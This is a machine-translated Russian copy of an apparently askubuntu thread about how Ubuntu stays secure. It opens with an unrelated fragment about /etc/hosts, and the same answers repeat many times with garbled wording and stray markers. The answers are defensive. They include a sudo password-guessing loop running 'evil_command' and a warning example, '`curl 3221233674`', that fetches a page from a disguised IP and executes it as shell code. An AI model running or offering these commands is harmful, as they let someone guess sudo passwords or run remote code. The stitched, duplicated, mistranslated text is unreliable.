Как система хранится в безопасности?

Чтобы исправить это, добавьте следующее в ваш / etc / hosts, если он еще не существует, который находится на большинстве, если не все выпуски ubuntu:

'127.0.0.1 localhost'

Однако я согласен с Йенсом. Кажется, ваш синтаксис неверен. Yuu говорит, что вы запускаете его против localhost: 8080, однако в вашем скрипте порт 80 жестко закодирован, что означает, что вы действительно говорите порт 80 на хосте localhost: 8080 и, конечно, этого хоста не существует.

С уважением, Йохен

24
задан 25 February 2011 в 22:38

20 ответов

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности, от сложных фреймворков, таких как AppArmor, до смиренных переменных ядра, таких как mmap_min_addr. Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список вместе с быстрыми пояснениями к Ubuntu Wiki.

Еще один важный фактор заключается в том, что обновления бывают быстрыми и легкими - поэтому большинство компьютеров будут обновлены до последних исправлений безопасности. [ ! d2]

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

Исправить пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует времени, чтобы взломать его. Ошибка в ядре. Но все функции безопасности ядра будут мешать. Обманите пользователя, чтобы отдать пароль, т. Е. Социальная инженерия. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 25 May 2018 в 22:49
  • 1
    Обратите внимание, что этот «пароль» является паролем пользователя с привилегиями sudo-to-root. По умолчанию учетная запись root отключена. # 3 - это действительно самое вероятное событие. Кроме того, если вы устанавливаете ненадежные репозитории, вы передаете бесплатные корневые учетные записи в этот репозиторий. – Lekensteyn 25 February 2011 в 23:04
  • 2
    @Lekensteyn, что ?! Как добавить ненадежные репозиции, раздающие root-доступ? Кстати, вы можете опубликовать его в качестве ответа, я хочу, чтобы этот поток был своего рода вики-сообществом. – Oxwivi 25 February 2011 в 23:10
  • 3
    В askubuntu не существует потоков, отличных от серверных процессов. Вы отправили комментарий к ответу на ваш вопрос . Я добавил ответ с пищей для размышлений. – Lekensteyn 26 February 2011 в 00:42
  • 4
    @Oxwivi Когда вы добавляете PPA и устанавливаете пакет, в пакете есть сценарии preinst и postinst, которые могут делать все, что им нравится. Он также может установить службу для запуска с правами root или mess с помощью sudoers. – hexafraction 22 September 2012 в 02:23

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности, от сложных фреймворков, таких как AppArmor, до смиренных переменных ядра, таких как mmap_min_addr. Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список вместе с быстрыми пояснениями к Ubuntu Wiki.

Еще один важный фактор заключается в том, что обновления бывают быстрыми и легкими - поэтому большинство компьютеров будут обновлены до последних исправлений безопасности. [ ! d2]

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

Исправить пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует времени, чтобы взломать его. Ошибка в ядре. Но все функции безопасности ядра будут мешать. Обманите пользователя, чтобы отдать пароль, т. Е. Социальная инженерия. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 25 July 2018 в 22:26

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности, от сложных фреймворков, таких как AppArmor, до смиренных переменных ядра, таких как mmap_min_addr. Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список вместе с быстрыми пояснениями к Ubuntu Wiki.

Еще один важный фактор заключается в том, что обновления бывают быстрыми и легкими - поэтому большинство компьютеров будут обновлены до последних исправлений безопасности. [ ! d2]

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

Исправить пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует времени, чтобы взломать его. Ошибка в ядре. Но все функции безопасности ядра будут мешать. Обманите пользователя, чтобы отдать пароль, т. Е. Социальная инженерия. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 31 July 2018 в 10:33

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности, от сложных фреймворков, таких как AppArmor, до смиренных переменных ядра, таких как mmap_min_addr. Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список вместе с быстрыми пояснениями к Ubuntu Wiki.

Еще один важный фактор заключается в том, что обновления бывают быстрыми и легкими - поэтому большинство компьютеров будут обновлены до последних исправлений безопасности. [ ! d2]

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

Исправить пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует времени, чтобы взломать его. Ошибка в ядре. Но все функции безопасности ядра будут мешать. Обманите пользователя, чтобы отдать пароль, т. Е. Социальная инженерия. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 31 July 2018 в 11:36

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности, от сложных фреймворков, таких как AppArmor, до смиренных переменных ядра, таких как mmap_min_addr. Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список вместе с быстрыми пояснениями к Ubuntu Wiki.

Еще один важный фактор заключается в том, что обновления бывают быстрыми и легкими - поэтому большинство компьютеров будут обновлены до последних исправлений безопасности. [ ! d2]

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

Исправить пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует времени, чтобы взломать его. Ошибка в ядре. Но все функции безопасности ядра будут мешать. Обманите пользователя, чтобы отдать пароль, т. Е. Социальная инженерия. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 2 August 2018 в 03:52

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности: от сложных фреймворков, таких как AppArmor, до скромных переменных ядра, таких как mmap_min_addr . Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список, а также краткие пояснения к Ubuntu Wiki .

Еще один важный фактор заключается в том, что обновления являются быстрыми и легкими - так что большинство компьютеров будут обновлены к последним исправлениям безопасности.

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

  1. Crack the пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует возраста, чтобы взломать его.
  2. Ошибка в ядре. Но все функции безопасности ядра будут мешать.
  3. Обмануть пользователя, чтобы отдать пароль, т. Е. Социальную инженерию. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 4 August 2018 в 19:56

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности: от сложных фреймворков, таких как AppArmor, до скромных переменных ядра, таких как mmap_min_addr . Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список, а также краткие пояснения к Ubuntu Wiki .

Еще один важный фактор заключается в том, что обновления являются быстрыми и легкими - так что большинство компьютеров будут обновлены к последним исправлениям безопасности.

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

  1. Crack the пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует возраста, чтобы взломать его.
  2. Ошибка в ядре. Но все функции безопасности ядра будут мешать.
  3. Обмануть пользователя, чтобы отдать пароль, т. Е. Социальную инженерию. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 6 August 2018 в 03:59

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности: от сложных фреймворков, таких как AppArmor, до скромных переменных ядра, таких как mmap_min_addr . Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список, а также краткие пояснения к Ubuntu Wiki .

Еще один важный фактор заключается в том, что обновления являются быстрыми и легкими - так что большинство компьютеров будут обновлены к последним исправлениям безопасности.

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

  1. Crack the пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует возраста, чтобы взломать его.
  2. Ошибка в ядре. Но все функции безопасности ядра будут мешать.
  3. Обмануть пользователя, чтобы отдать пароль, т. Е. Социальную инженерию. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 7 August 2018 в 21:56

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности: от сложных фреймворков, таких как AppArmor, до скромных переменных ядра, таких как mmap_min_addr . Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список, а также краткие пояснения к Ubuntu Wiki .

Еще один важный фактор заключается в том, что обновления являются быстрыми и легкими - так что большинство компьютеров будут обновлены к последним исправлениям безопасности.

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

  1. Crack the пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует возраста, чтобы взломать его.
  2. Ошибка в ядре. Но все функции безопасности ядра будут мешать.
  3. Обмануть пользователя, чтобы отдать пароль, т. Е. Социальную инженерию. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 10 August 2018 в 10:11

Это сложный вопрос. В системе Ubuntu существует множество различных уровней безопасности: от сложных фреймворков, таких как AppArmor, до скромных переменных ядра, таких как mmap_min_addr . Вы можете добавить некоторые функции ядра, такие как рандомизация памяти в миксе. Вы можете найти их список, а также краткие пояснения к Ubuntu Wiki .

Еще один важный фактор заключается в том, что обновления являются быстрыми и легкими - так что большинство компьютеров будут обновлены к последним исправлениям безопасности.

Насколько я знаю, злоумышленник, получивший локальный доступ к вашему компьютеру, имеет три способа масштабирования привилегий ядра:

  1. Crack the пароль. Но это будет очень сложно, пароль хранится в зашифрованном виде, используя алгоритмы без известного недостатка. Это потребует возраста, чтобы взломать его.
  2. Ошибка в ядре. Но все функции безопасности ядра будут мешать.
  3. Обмануть пользователя, чтобы отдать пароль, т. Е. Социальную инженерию. Просто покажите фальшивый диалог с паролем или используйте другой трюк. Это самый простой способ сделать это.

Третий момент - самая слабая уязвимость прямо сейчас.

20
ответ дан 13 August 2018 в 16:32
  • 1
    Обратите внимание, что этот «пароль» является паролем пользователя с привилегиями sudo-to-root. По умолчанию учетная запись root отключена. # 3 - это действительно самое вероятное событие. Кроме того, если вы устанавливаете ненадежные репозитории, вы передаете бесплатные корневые учетные записи в этот репозиторий. – Lekensteyn 25 February 2011 в 23:04
  • 2
    @Lekensteyn, что ?! Как добавить ненадежные репозиции, раздающие root-доступ? Кстати, вы можете опубликовать его в качестве ответа, я хочу, чтобы этот поток был своего рода вики-сообществом. – Oxwivi 25 February 2011 в 23:10
  • 3
    В askubuntu не существует потоков, отличных от серверных процессов. Вы отправили комментарий к answer к вашему вопросу . Я добавил ответ с пищей для размышлений. – Lekensteyn 26 February 2011 в 00:42
  • 4
    @Oxwivi Когда вы добавляете PPA и устанавливаете пакет, в пакете есть сценарии preinst и postinst, которые могут делать все, что им нравится. Он также может установить сервис, выполняемый как root или mess с помощью sudoers . – hexafraction 22 September 2012 в 02:23

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить некоторый пароль:

#!/bin/sh
for pass in password 123 ubuntu pass; do
    echo $pass|sudo -S evil_command
done

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo], репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенной программы.

Процесс обновления запускается как root, иначе файлы не могли быть записаны в /usr/bin или /etc. Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash]. [ ! d2]

Как упоминалось в Javier Rivera, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно багги setsuid корневые двоичные файлы (двоичные файлы, которые будут выполняться под владельцем файла, root) и другие (! d3)

Вы можете создавать дыры в системе, если не обращаете внимания на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob к /etc/cron.daily, который запускает программу в вашей домашней папке (например, /bin/sh /home/your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами , эксплойт может помещать вредоносный код в myscript.sh, который будет запускаться как root (эскалация привилегий).

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что если кто-то говорит run `curl 3221233674` с обратными тиками, нет. 3221233674 - это еще один способ написать 192.0.32.10 (IP example.com). Таким образом, он будет равен:

`curl http://example.com/`

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http://example.com/ и попробуйте выполнить загруженную страницу».

Сначала , вы не увидите что-то злонамеренное в данной команде, но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 25 May 2018 в 22:49
  • 1
    Спасибо за ответ, надеюсь, вы не возражали против моих изменений. Примите во внимание мои изменения, чтобы улучшить свой английский. – Oxwivi 26 February 2011 в 01:05
  • 2
    Нет, я не против. Каждое улучшение приветствуется :) – Lekensteyn 26 February 2011 в 01:11
  • 3
    Независимо от того, это отличный пост, нужно отметить те моменты, которые вы упомянули! – Oxwivi 26 February 2011 в 01:17

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить некоторый пароль:

#!/bin/sh for pass in password 123 ubuntu pass; do echo $pass|sudo -S evil_command done

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo], репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенной программы.

Процесс обновления запускается как root, иначе файлы не могли быть записаны в /usr/bin или /etc. Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash]. [ ! d2]

Как упоминалось в Javier Rivera, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно багги setsuid корневые двоичные файлы (двоичные файлы, которые будут выполняться под владельцем файла, root) и другие (! d3)

Вы можете создавать дыры в системе, если не обращаете внимания на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob к /etc/cron.daily, который запускает программу в вашей домашней папке (например, /bin/sh /home/your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами , эксплойт может помещать вредоносный код в myscript.sh, который будет запускаться как root (эскалация привилегий).

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что если кто-то говорит run `curl 3221233674` с обратными тиками, нет. 3221233674 - это еще один способ написать 192.0.32.10 (IP example.com). Таким образом, он будет равен:

`curl http://example.com/`

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http://example.com/ и попробуйте выполнить загруженную страницу».

Сначала , вы не увидите что-то злонамеренное в данной команде, но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 25 July 2018 в 22:26
  • 1
    Спасибо за ответ, надеюсь, вы не возражали против моих изменений. Примите во внимание мои изменения, чтобы улучшить свой английский. – Oxwivi 26 February 2011 в 01:05
  • 2
    Нет, я не против. Каждое улучшение приветствуется :) – Lekensteyn 26 February 2011 в 01:11
  • 3
    Независимо от того, это отличный пост, нужно отметить те моменты, которые вы упомянули! – Oxwivi 26 February 2011 в 01:17

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить некоторый пароль:

#!/bin/sh for pass in password 123 ubuntu pass; do echo $pass|sudo -S evil_command done

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo], репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенной программы.

Процесс обновления запускается как root, иначе файлы не могли быть записаны в /usr/bin или /etc. Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash]. [ ! d2]

Как упоминалось в Javier Rivera, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно багги setsuid корневые двоичные файлы (двоичные файлы, которые будут выполняться под владельцем файла, root) и другие (! d3)

Вы можете создавать дыры в системе, если не обращаете внимания на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob к /etc/cron.daily, который запускает программу в вашей домашней папке (например, /bin/sh /home/your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами , эксплойт может помещать вредоносный код в myscript.sh, который будет запускаться как root (эскалация привилегий).

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что если кто-то говорит run `curl 3221233674` с обратными тиками, нет. 3221233674 - это еще один способ написать 192.0.32.10 (IP example.com). Таким образом, он будет равен:

`curl http://example.com/`

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http://example.com/ и попробуйте выполнить загруженную страницу».

Сначала , вы не увидите что-то злонамеренное в данной команде, но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 31 July 2018 в 10:33
  • 1
    Спасибо за ответ, надеюсь, вы не возражали против моих изменений. Примите во внимание мои изменения, чтобы улучшить свой английский. – Oxwivi 26 February 2011 в 01:05
  • 2
    Нет, я не против. Каждое улучшение приветствуется :) – Lekensteyn 26 February 2011 в 01:11
  • 3
    Независимо от того, это отличный пост, нужно отметить те моменты, которые вы упомянули! – Oxwivi 26 February 2011 в 01:17

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить некоторый пароль:

#!/bin/sh for pass in password 123 ubuntu pass; do echo $pass|sudo -S evil_command done

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo], репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенной программы.

Процесс обновления запускается как root, иначе файлы не могли быть записаны в /usr/bin или /etc. Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash]. [ ! d2]

Как упоминалось в Javier Rivera, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно багги setsuid корневые двоичные файлы (двоичные файлы, которые будут выполняться под владельцем файла, root) и другие (! d3)

Вы можете создавать дыры в системе, если не обращаете внимания на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob к /etc/cron.daily, который запускает программу в вашей домашней папке (например, /bin/sh /home/your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами , эксплойт может помещать вредоносный код в myscript.sh, который будет запускаться как root (эскалация привилегий).

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что если кто-то говорит run `curl 3221233674` с обратными тиками, нет. 3221233674 - это еще один способ написать 192.0.32.10 (IP example.com). Таким образом, он будет равен:

`curl http://example.com/`

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http://example.com/ и попробуйте выполнить загруженную страницу».

Сначала , вы не увидите что-то злонамеренное в данной команде, но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 31 July 2018 в 11:36
  • 1
    Спасибо за ответ, надеюсь, вы не возражали против моих изменений. Примите во внимание мои изменения, чтобы улучшить свой английский. – Oxwivi 26 February 2011 в 01:05
  • 2
    Нет, я не против. Каждое улучшение приветствуется :) – Lekensteyn 26 February 2011 в 01:11
  • 3
    Независимо от того, это отличный пост, нужно отметить те моменты, которые вы упомянули! – Oxwivi 26 February 2011 в 01:17

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить некоторый пароль:

#!/bin/sh for pass in password 123 ubuntu pass; do echo $pass|sudo -S evil_command done

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo], репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенной программы.

Процесс обновления запускается как root, иначе файлы не могли быть записаны в /usr/bin или /etc. Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash]. [ ! d2]

Как упоминалось в Javier Rivera, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно багги setsuid корневые двоичные файлы (двоичные файлы, которые будут выполняться под владельцем файла, root) и другие (! d3)

Вы можете создавать дыры в системе, если не обращаете внимания на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob к /etc/cron.daily, который запускает программу в вашей домашней папке (например, /bin/sh /home/your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами , эксплойт может помещать вредоносный код в myscript.sh, который будет запускаться как root (эскалация привилегий).

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что если кто-то говорит run `curl 3221233674` с обратными тиками, нет. 3221233674 - это еще один способ написать 192.0.32.10 (IP example.com). Таким образом, он будет равен:

`curl http://example.com/`

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http://example.com/ и попробуйте выполнить загруженную страницу».

Сначала , вы не увидите что-то злонамеренное в данной команде, но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 2 August 2018 в 03:52
  • 1
    Спасибо за ответ, надеюсь, вы не возражали против моих изменений. Примите во внимание мои изменения, чтобы улучшить свой английский. – Oxwivi 26 February 2011 в 01:05
  • 2
    Нет, я не против. Каждое улучшение приветствуется :) – Lekensteyn 26 February 2011 в 01:11
  • 3
    Независимо от того, это отличный пост, нужно отметить те моменты, которые вы упомянули! – Oxwivi 26 February 2011 в 01:17

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить пароль:

  #! / Bin / sh для пароля pass 123 ubuntu pass;  do echo $ pass | sudo -S evil_command done  

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo] , репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенная программа.

Процесс обновления запускается как root, иначе файлы не могут быть записаны в / usr / bin или / etc . Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник для вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash).

Как уже упоминалось Хавьером Риверой, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно глючные setsuid корневые двоичные файлы ( двоичные файлы, которые будут выполняться под владельцем файла, root) и другими багги-программами, запущенными как root.

Вы можете создать дыры в системе, если не обратите внимание на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob в /etc/cron.daily , который запускает программу в вашей домашней папке (например, / bin / sh / home /your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами, эксплойт может поместить вредоносный код в myscript.sh , который будет запущен

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что он делает. Если кто-то говорит, что запустите `curl 3221233674` [ ! d10] с back-ticks, нет. 3221233674 - это еще один способ записи 192.0.32.10 (IP example.com). Таким образом, он будет равен:

   `curl http: // example.com /`  

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http : //example.com/ и попытайтесь выполнить загруженную страницу ".

Сначала вы не увидите что-то злонамеренное в данной команде. Но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 4 August 2018 в 19:56

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить пароль:

  #! / Bin / sh для пароля pass 123 ubuntu pass;  do echo $ pass | sudo -S evil_command done  

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo] , репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенная программа.

Процесс обновления запускается как root, иначе файлы не могут быть записаны в / usr / bin или / etc . Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник для вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash).

Как уже упоминалось Хавьером Риверой, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно глючные setsuid корневые двоичные файлы ( двоичные файлы, которые будут выполняться под владельцем файла, root) и другими багги-программами, запущенными как root.

Вы можете создать дыры в системе, если не обратите внимание на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob в /etc/cron.daily , который запускает программу в вашей домашней папке (например, / bin / sh / home /your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами, эксплойт может поместить вредоносный код в myscript.sh , который будет запущен

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что он делает. Если кто-то говорит, что запустите `curl 3221233674` [ ! d10] с back-ticks, нет. 3221233674 - это еще один способ записи 192.0.32.10 (IP example.com). Таким образом, он будет равен:

   `curl http: // example.com /`  

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http : //example.com/ и попытайтесь выполнить загруженную страницу ".

Сначала вы не увидите что-то злонамеренное в данной команде. Но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
